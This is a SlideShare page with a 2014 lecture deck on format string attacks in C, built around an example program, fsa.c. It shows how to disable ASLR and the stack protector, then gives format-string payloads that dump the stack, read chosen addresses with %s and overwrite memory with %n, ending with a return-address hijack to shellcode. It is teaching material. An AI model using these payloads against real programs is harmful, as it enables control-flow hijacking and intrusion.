SlideShare a Scribd company logo

[MOSUT] Format String Attacks

Download as PPTX, PDF
Aj MaChInE
Aj MaChInE

This document discusses format string attacks and how they can be exploited. It provides an example (fsa.c) of a program with a format string vulnerability. By compiling the program without protections and disabling ASLR, an attacker can view the program stack using different format strings. This allows viewing memory at any location and overwriting arbitrary memory by exploiting the %n field. So a format string vulnerability can be used to overwrite return addresses and execute shellcode.

Self ImprovementEntertainment & HumorTechnology
1 of 16
Format String Attacks AJ 2014.1.18
About Me • Study in National Chung Cheng University • The simulator of 5 axis CNC machine tool • CUDA programming for the collision detection in real time • 若渴計畫 & MOSUT
Outline • Illustrating format string vulnerabilities • A case study • • • • • fsa.c Compile and setup insecure environment Viewing the stack Viewing memory at any location Overwriting of arbitrary memory • So, you can…
Format String Vulnerabilities • format string <->argv[1] • printf(argv[1]) • strcpy(buff,argv[1]) • snprintf(buf,sizeof buf,argv[1]); •… • EX: compile & execute
A Case Study: fsa.c
A Case Study: Compile and Setup Insecure Environment • Compile • gcc -g -Wno-format-security -fno-stack-protector fsa.c • Disable ASLR(address space layout randomization) • sudo sysctl -w kernel.randomize_va_space=0 • X86 machine & Unbuntu 12.04
Stack Status before Executing snpritf() esp ?? ?? ?? x = 97 = ‘a’ buf[100] stack
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) Buffer length argv[1] pointer ?? b7ff3fec ?? bfffff3b4 c call convention http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html ?? 0 x = 97 = ‘a’ buf[100] Richard Reese,透視c語言指標 p.128
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) fetch Buffer length argv[1] pointer stack %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer Buffer length • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) argv[1] pointer ?? b7ff3fec ?? bfffff3b4 ?? 0 copy x = 97 = ‘a’ %x?? Execution order of “copy” and “fetch” are switched by OS buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
Viewing the Stack: “aaaa.%x.%x.%x.%x.%x” • Format string = aaaa.%x.%x.%x.%x.%x heap “aaaa.%x.%x.%x.% x.%x” Buffer pointer • ‘a’ is 0x61 in ASCII • snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”) Buffer length argv[1] pointer %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]=aaaa.b7ff3f ec.bffff3a4.0.61.6161 6161
Viewing Memory at Any Location • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8
Overwriting of Arbitrary Memory • The %n field was encountered in the format string • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n 26(??) alignment bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8 bffff2f8 x = 28 = 0x1c %n buf[0]=bffff2f8
So, You Can… • Format string vulnerabilities • Viewing the stack • Finding return addresses • Overwriting return address • Overwriting return addresses to point to shellcode • EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
You can overwrite arbitrary memory, if there are format string vulnerabilities
Reference • Tim Newsham, “Format String Attacks” • http://www.thenewsh.com/~newsham/format-string-attacks.pdf • stackoverflow,“How can a Format-String vulnerability be exploited?” • http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited • Paul Haas, Advanced Format String Attacks • http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf • David Brumley, Cource sliedes • http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf • Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf

Recommended

2.Format Strings
2.Format Strings2.Format Strings
2.Format Strings
phanleson
 
Control hijacking
Control hijackingControl hijacking
Control hijacking
G Prachi
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflows
drewz lin
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer Overflows
Sumit Kumar
 
Common mistakes in C programming
Common mistakes in C programmingCommon mistakes in C programming
Common mistakes in C programming
Larion
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
harshal kshatriya
 
Evgeniy Muralev, Mark Vince, Working with the compiler, not against it
Evgeniy Muralev, Mark Vince, Working with the compiler, not against itEvgeniy Muralev, Mark Vince, Working with the compiler, not against it
Evgeniy Muralev, Mark Vince, Working with the compiler, not against it
Sergey Platonov
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msan
Yandex
 

Recommended

2.Format Strings
2.Format Strings2.Format Strings
2.Format Strings
phanleson
 
Control hijacking
Control hijackingControl hijacking
Control hijacking
G Prachi
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflows
drewz lin
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer Overflows
Sumit Kumar
 
Common mistakes in C programming
Common mistakes in C programmingCommon mistakes in C programming
Common mistakes in C programming
Larion
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
harshal kshatriya
 
Evgeniy Muralev, Mark Vince, Working with the compiler, not against it
Evgeniy Muralev, Mark Vince, Working with the compiler, not against itEvgeniy Muralev, Mark Vince, Working with the compiler, not against it
Evgeniy Muralev, Mark Vince, Working with the compiler, not against it
Sergey Platonov
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msan
Yandex
 
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Minsk Linux User Group
 
Mathematicians: Trust, but Verify
Mathematicians: Trust, but VerifyMathematicians: Trust, but Verify
Mathematicians: Trust, but Verify
Andrey Karpov
 
Антон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++NextАнтон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++Next
Sergey Platonov
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
Andrey Karpov
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
Matt Provost
 
Weakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target PrefixWeakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target Prefix
MASAYUKITEZUKA1
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
Andrey Karpov
 
1.Buffer Overflows
1.Buffer Overflows1.Buffer Overflows
1.Buffer Overflows
phanleson
 
Valgrind
ValgrindValgrind
Valgrind
aidanshribman
 
Tensor comprehensions
Tensor comprehensionsTensor comprehensions
Tensor comprehensions
Mr. Vengineer
 
Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >
Sergey Platonov
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs
Computer Science Club
 
Tiramisu概要
Tiramisu概要Tiramisu概要
Tiramisu概要
Mr. Vengineer
 
TensorFlow local Python XLA client
TensorFlow local Python XLA clientTensorFlow local Python XLA client
TensorFlow local Python XLA client
Mr. Vengineer
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs
Computer Science Club
 
Linux on System z debugging with Valgrind
Linux on System z debugging with ValgrindLinux on System z debugging with Valgrind
Linux on System z debugging with Valgrind
IBM India Smarter Computing
 
Clang tidy
Clang tidyClang tidy
Clang tidy
Yury Yafimachau
 
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Min-Yih Hsu
 
tick cross game
tick cross gametick cross game
tick cross game
sanobersheir
 
[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹
Aj MaChInE
 
[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming
Aj MaChInE
 
[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA
Aj MaChInE
 

More Related Content

What's hot

Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Minsk Linux User Group
 
Mathematicians: Trust, but Verify
Mathematicians: Trust, but VerifyMathematicians: Trust, but Verify
Mathematicians: Trust, but Verify
Andrey Karpov
 
Антон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++NextАнтон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++Next
Sergey Platonov
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
Andrey Karpov
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
Matt Provost
 
Weakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target PrefixWeakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target Prefix
MASAYUKITEZUKA1
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
Andrey Karpov
 
1.Buffer Overflows
1.Buffer Overflows1.Buffer Overflows
1.Buffer Overflows
phanleson
 
Valgrind
ValgrindValgrind
Valgrind
aidanshribman
 
Tensor comprehensions
Tensor comprehensionsTensor comprehensions
Tensor comprehensions
Mr. Vengineer
 
Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >
Sergey Platonov
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs
Computer Science Club
 
Tiramisu概要
Tiramisu概要Tiramisu概要
Tiramisu概要
Mr. Vengineer
 
TensorFlow local Python XLA client
TensorFlow local Python XLA clientTensorFlow local Python XLA client
TensorFlow local Python XLA client
Mr. Vengineer
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs
Computer Science Club
 
Linux on System z debugging with Valgrind
Linux on System z debugging with ValgrindLinux on System z debugging with Valgrind
Linux on System z debugging with Valgrind
IBM India Smarter Computing
 
Clang tidy
Clang tidyClang tidy
Clang tidy
Yury Yafimachau
 
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Min-Yih Hsu
 
tick cross game
tick cross gametick cross game
tick cross game
sanobersheir
 

What's hot (19)

Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
 
Mathematicians: Trust, but Verify
Mathematicians: Trust, but VerifyMathematicians: Trust, but Verify
Mathematicians: Trust, but Verify
 
Антон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++NextАнтон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++Next
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
 
Weakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target PrefixWeakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target Prefix
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
 
1.Buffer Overflows
1.Buffer Overflows1.Buffer Overflows
1.Buffer Overflows
 
Valgrind
ValgrindValgrind
Valgrind
 
Tensor comprehensions
Tensor comprehensionsTensor comprehensions
Tensor comprehensions
 
Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs
 
Tiramisu概要
Tiramisu概要Tiramisu概要
Tiramisu概要
 
TensorFlow local Python XLA client
TensorFlow local Python XLA clientTensorFlow local Python XLA client
TensorFlow local Python XLA client
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs
 
Linux on System z debugging with Valgrind
Linux on System z debugging with ValgrindLinux on System z debugging with Valgrind
Linux on System z debugging with Valgrind
 
Clang tidy
Clang tidyClang tidy
Clang tidy
 
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
 
tick cross game
tick cross gametick cross game
tick cross game
 

Viewers also liked

[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹
Aj MaChInE
 
[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming
Aj MaChInE
 
[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA
Aj MaChInE
 
閱讀文章分享@若渴 2016.1.24
閱讀文章分享@若渴 2016.1.24閱讀文章分享@若渴 2016.1.24
閱讀文章分享@若渴 2016.1.24
Aj MaChInE
 
[若渴計畫2015.8.18] SMACK
[若渴計畫2015.8.18] SMACK[若渴計畫2015.8.18] SMACK
[若渴計畫2015.8.18] SMACK
Aj MaChInE
 
[若渴計畫] Studying Concurrency
[若渴計畫] Studying Concurrency[若渴計畫] Studying Concurrency
[若渴計畫] Studying Concurrency
Aj MaChInE
 
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
Aj MaChInE
 
Format string Attack
Format string AttackFormat string Attack
Format string Attack
icchy
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Kapil Nagrale
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Joe McCarthy
 

Viewers also liked (10)

[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹
 
[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming
 
[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA
 
閱讀文章分享@若渴 2016.1.24
閱讀文章分享@若渴 2016.1.24閱讀文章分享@若渴 2016.1.24
閱讀文章分享@若渴 2016.1.24
 
[若渴計畫2015.8.18] SMACK
[若渴計畫2015.8.18] SMACK[若渴計畫2015.8.18] SMACK
[若渴計畫2015.8.18] SMACK
 
[若渴計畫] Studying Concurrency
[若渴計畫] Studying Concurrency[若渴計畫] Studying Concurrency
[若渴計畫] Studying Concurrency
 
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
 
Format string Attack
Format string AttackFormat string Attack
Format string Attack
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 

Similar to [MOSUT] Format String Attacks

Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming
Cloudflare
 
Race-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memoryRace-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memory
Timur Shemsedinov
 
JavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame GraphsJavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame Graphs
Brendan Gregg
 
Format String Exploitation
Format String ExploitationFormat String Exploitation
Format String Exploitation
UTD Computer Security Group
 
Dynamic memory allocation
Dynamic memory allocationDynamic memory allocation
Dynamic memory allocation
Viji B
 
FreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame GraphsFreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame Graphs
Brendan Gregg
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
Weber Tsai
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
Russell Sanford
 
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Charles Nutter
 
Vim Script Programming
Vim Script ProgrammingVim Script Programming
Vim Script Programming
Lin Yo-An
 
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
DataStax
 
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
confluent
 
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
Teddy Hsiung
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for Dummies
Charles Nutter
 
Open Source Systems Performance
Open Source Systems PerformanceOpen Source Systems Performance
Open Source Systems Performance
Brendan Gregg
 
Java Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame GraphsJava Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame Graphs
Brendan Gregg
 
Web Locks API
Web Locks APIWeb Locks API
Web Locks API
Timur Shemsedinov
 
Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011
CodeIgniter Conference
 
Bottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMPBottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMP
katzgrau
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 

Similar to [MOSUT] Format String Attacks (20)

Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming
 
Race-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memoryRace-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memory
 
JavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame GraphsJavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame Graphs
 
Format String Exploitation
Format String ExploitationFormat String Exploitation
Format String Exploitation
 
Dynamic memory allocation
Dynamic memory allocationDynamic memory allocation
Dynamic memory allocation
 
FreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame GraphsFreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame Graphs
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
 
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
 
Vim Script Programming
Vim Script ProgrammingVim Script Programming
Vim Script Programming
 
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
 
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
 
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for Dummies
 
Open Source Systems Performance
Open Source Systems PerformanceOpen Source Systems Performance
Open Source Systems Performance
 
Java Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame GraphsJava Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame Graphs
 
Web Locks API
Web Locks APIWeb Locks API
Web Locks API
 
Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011
 
Bottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMPBottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMP
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 

More from Aj MaChInE

An Intro on Data-oriented Attacks
An Intro on Data-oriented AttacksAn Intro on Data-oriented Attacks
An Intro on Data-oriented Attacks
Aj MaChInE
 
A Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part IA Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part I
Aj MaChInE
 
A study on NetSpectre
A study on NetSpectreA study on NetSpectre
A study on NetSpectre
Aj MaChInE
 
Introduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsIntroduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation Tools
Aj MaChInE
 
[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoin[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoin
Aj MaChInE
 
[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection
Aj MaChInE
 
[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of Trustzone[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of Trustzone
Aj MaChInE
 
[若渴]Study on Side Channel Attacks and Countermeasures
[若渴]Study on Side Channel Attacks and Countermeasures [若渴]Study on Side Channel Attacks and Countermeasures
[若渴]Study on Side Channel Attacks and Countermeasures
Aj MaChInE
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 
[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for Code[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for Code
Aj MaChInE
 
[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cache[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cache
Aj MaChInE
 
[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
Aj MaChInE
 

More from Aj MaChInE (12)

An Intro on Data-oriented Attacks
An Intro on Data-oriented AttacksAn Intro on Data-oriented Attacks
An Intro on Data-oriented Attacks
 
A Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part IA Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part I
 
A study on NetSpectre
A study on NetSpectreA study on NetSpectre
A study on NetSpectre
 
Introduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsIntroduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation Tools
 
[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoin[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoin
 
[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection
 
[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of Trustzone[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of Trustzone
 
[若渴]Study on Side Channel Attacks and Countermeasures
[若渴]Study on Side Channel Attacks and Countermeasures [若渴]Study on Side Channel Attacks and Countermeasures
